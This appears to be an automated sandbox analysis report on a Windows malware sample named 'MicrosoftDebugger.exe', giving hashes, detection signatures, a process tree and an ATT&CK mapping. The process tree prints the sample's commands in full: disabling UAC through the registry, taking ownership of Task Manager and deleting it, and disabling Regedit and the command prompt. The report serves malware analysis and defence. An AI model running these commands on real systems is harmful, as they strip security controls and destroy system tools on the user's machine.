Analysis
-
max time kernel
1s -
max time network
7s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
11/06/2024, 19:47
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
MicrosoftDebugger.exe
Resource
win7-20240419-en
11 signatures
150 seconds
General
-
Target
MicrosoftDebugger.exe
-
Size
101KB
-
MD5
894aae812eb6f72bbd33c795d4db67fb
-
SHA1
b6e089caab3470431b18316ffd82ea49783d4a72
-
SHA256
10d6eda28eab6b3c3f3ce1183ddc2ddf39559eaf090d794b95b2c481b25241a5
-
SHA512
0ad002903e4d0bf50578630f0dfe7f943632c6562871caa07cd527a19ddf50cb2f888334e6574b3fe39ff176fbb0cda60cb1612c96f91921f0421230503baec1
-
SSDEEP
3072:pJrwXlyq82c0PTuMqSwNd4IYh5eWBgaQE:HYJy0pqDfE
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Possible privilege escalation attempt 4 IoCs
pid Process 4544 icacls.exe 2728 takeown.exe 2272 icacls.exe 3596 takeown.exe -
Modifies file permissions 1 TTPs 4 IoCs
pid Process 4544 icacls.exe 2728 takeown.exe 2272 icacls.exe 3596 takeown.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS MicrosoftDebugger.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer MicrosoftDebugger.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 2076 reg.exe 2580 reg.exe 2124 reg.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 3596 takeown.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 3024 wrote to memory of 3716 3024 MicrosoftDebugger.exe 92 PID 3024 wrote to memory of 3716 3024 MicrosoftDebugger.exe 92 PID 3024 wrote to memory of 3716 3024 MicrosoftDebugger.exe 92 PID 3716 wrote to memory of 2076 3716 cmd.exe 93 PID 3716 wrote to memory of 2076 3716 cmd.exe 93 PID 3716 wrote to memory of 2076 3716 cmd.exe 93 PID 3024 wrote to memory of 3480 3024 MicrosoftDebugger.exe 94 PID 3024 wrote to memory of 3480 3024 MicrosoftDebugger.exe 94 PID 3024 wrote to memory of 3480 3024 MicrosoftDebugger.exe 94 PID 3480 wrote to memory of 3596 3480 cmd.exe 95 PID 3480 wrote to memory of 3596 3480 cmd.exe 95 PID 3480 wrote to memory of 3596 3480 cmd.exe 95 PID 3024 wrote to memory of 856 3024 MicrosoftDebugger.exe 96 PID 3024 wrote to memory of 856 3024 MicrosoftDebugger.exe 96 PID 3024 wrote to memory of 856 3024 MicrosoftDebugger.exe 96 PID 856 wrote to memory of 4544 856 cmd.exe 97 PID 856 wrote to memory of 4544 856 cmd.exe 97 PID 856 wrote to memory of 4544 856 cmd.exe 97 PID 3024 wrote to memory of 916 3024 MicrosoftDebugger.exe 98 PID 3024 wrote to memory of 916 3024 MicrosoftDebugger.exe 98 PID 3024 wrote to memory of 916 3024 MicrosoftDebugger.exe 98 PID 916 wrote to memory of 2728 916 cmd.exe 99 PID 916 wrote to memory of 2728 916 cmd.exe 99 PID 916 wrote to memory of 2728 916 cmd.exe 99 PID 916 wrote to memory of 2272 916 cmd.exe 100 PID 916 wrote to memory of 2272 916 cmd.exe 100 PID 916 wrote to memory of 2272 916 cmd.exe 100 PID 3024 wrote to memory of 3780 3024 MicrosoftDebugger.exe 101 PID 3024 wrote to memory of 3780 3024 MicrosoftDebugger.exe 101 PID 3024 wrote to memory of 3780 3024 MicrosoftDebugger.exe 101 PID 3780 wrote to memory of 2580 3780 cmd.exe 102 PID 3780 wrote to memory of 2580 3780 cmd.exe 102 PID 3780 wrote to memory of 2580 3780 cmd.exe 102 PID 3024 wrote to memory of 2212 3024 MicrosoftDebugger.exe 103 PID 3024 wrote to memory of 2212 3024 MicrosoftDebugger.exe 103 PID 3024 wrote to memory of 2212 3024 MicrosoftDebugger.exe 103 PID 2212 wrote to memory of 2124 2212 cmd.exe 104 PID 2212 wrote to memory of 2124 2212 cmd.exe 104 PID 2212 wrote to memory of 2124 2212 cmd.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\MicrosoftDebugger.exe"C:\Users\Admin\AppData\Local\Temp\MicrosoftDebugger.exe"1⤵
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\SysWOW64\reg.exeREG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:2076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c takeown /F "C:\Windows\System32\Taskmgr.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Windows\System32\Taskmgr.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\System32\Taskmgr.exe" /grant "%USERNAME%":(F)2⤵
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\System32\Taskmgr.exe" /grant "Admin":(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c takeown /F "C:\Windows\System32\Taskmgr.exe" && icacls "C:\Windows\System32\Taskmgr.exe" /grant "%USERNAME%":(F) && del /F /Q "C:\Windows\System32\Taskmgr.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Windows\System32\Taskmgr.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2728
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\System32\Taskmgr.exe" /grant "Admin":(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f3⤵
- Disables RegEdit via registry modification
- Modifies registry key
PID:2580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:2124
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1